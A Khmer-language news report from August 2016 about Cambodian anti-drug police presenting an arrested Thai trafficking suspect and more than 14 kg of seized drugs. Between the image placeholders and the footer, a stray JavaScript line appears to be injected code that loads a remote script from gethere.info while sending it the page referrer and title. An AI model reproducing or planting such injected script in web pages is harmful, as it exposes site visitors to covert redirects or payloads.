សន្និសិទបង្ហាញមុខមេខ្លោងជួញដូរ និងថ្នាំញៀនជាង ១៥ គីឡូក្រាម

image-522-768x765-1ភ្នំពេញ៖ នៅវេលាម៉ោង៥៖៣០នាទី ល្ងាចថ្ងៃទី៤ ខែសីហា ឆ្នាំ២០១៦នេះ នគរបាលមន្ទីរប្រឆាំងគ្រឿងញៀន នៃអគ្គស្នងការដ្ឋាននគរបាលជាតិ បានបង្ហាញមុខមេក្លោងជួញដូរគ្រឿងញៀនជនជាតិថៃម្នាក់ ដែលត្រូវបានចាប់ខ្លួនជាមួយថ្នាំជាង១៤គីឡូក្រាម មុនបញ្ជូនទៅកាន់តុលាការដើម្បីចាត់ការបន្តទៀត។
ការបង្ហាញមុខមេក្លោង ជួញដូរគ្រឿងញៀនខាងលើនេះ បានធ្វើឡើងក្រោមវត្តមានលោកឧត្តមសេនីយ៍ទោ សាន្ត សុទ្ធី នាយរងមន្ទីរប្រឆាំងគ្រឿងញៀន និងមន្រ្តីនគរបាលមួយចំនួនទៀត។
សូមបញ្ជាក់ថា មេក្លោងជួញដូរគ្រឿងញៀនជនជាតិថៃដ៏ធំរូបនេះ ត្រូវបាន កម្លាំងនគរបាលចាប់ខ្លួន នៅល្ងាចថ្ងៃទី១ ខែសីហា ឆ្នាំ២០១៦ចំណុចផ្លូវលំ ភូមិត្រពាំងឈូក សង្កាត់ទឹកថ្លា ខណ្ឌសែនសុខ រាជធានីភ្នំពេញ ដោយធ្វើការរឹបអូសគ្រឿងញៀនយ៉ាងច្រើនច្រើនលើសលប់ស្ទើរតែមិនធ្លាប់មាននាពេលកន្លងទៅ។
ក្រោយការចាប់ខ្លួនរួចមក នៅថ្ងៃទី២ ខែសីហា ឆ្នាំ២០១៦ កម្លាំងនគរបាលមន្ទីរប្រឆាំងគ្រឿងញៀន បាននាំខ្លួនមេក្លោងរូបនេះ ទៅឆែកឆេរដល់ផ្ទះស្នាក់នៅ ផ្ទះលេខ៣ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ ដោយហូតបានថ្នាំញៀន បន្ថែមទៀត។ លោកឧត្តមសេនីយ៍ឯក ម៉ក់ ជីតូ អគ្គស្នងការរងនគរបាលជាតិ បានឲ្យដឹងថា ជនល្មើស ឈ្មោះ ឆៃ យ៉ាភុងភិសៃផាន់ ជនជាតិថៃ ភេទប្រុស អាយុ៥២ឆ្នាំ។
នៅក្នុងសន្និសីទកាសែតខាងលើនេះ កម្លាំងនគរបាលក៏បាននាំខ្លួនទណ្ឌិតម្នាក់ទៀត ដែលជាបក្ខពួករបស់មេក្លោងមកចង្អុលបង្ហាញបន្ថែមផងដែរ៕

image image image image image image image image image imageimageimage

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More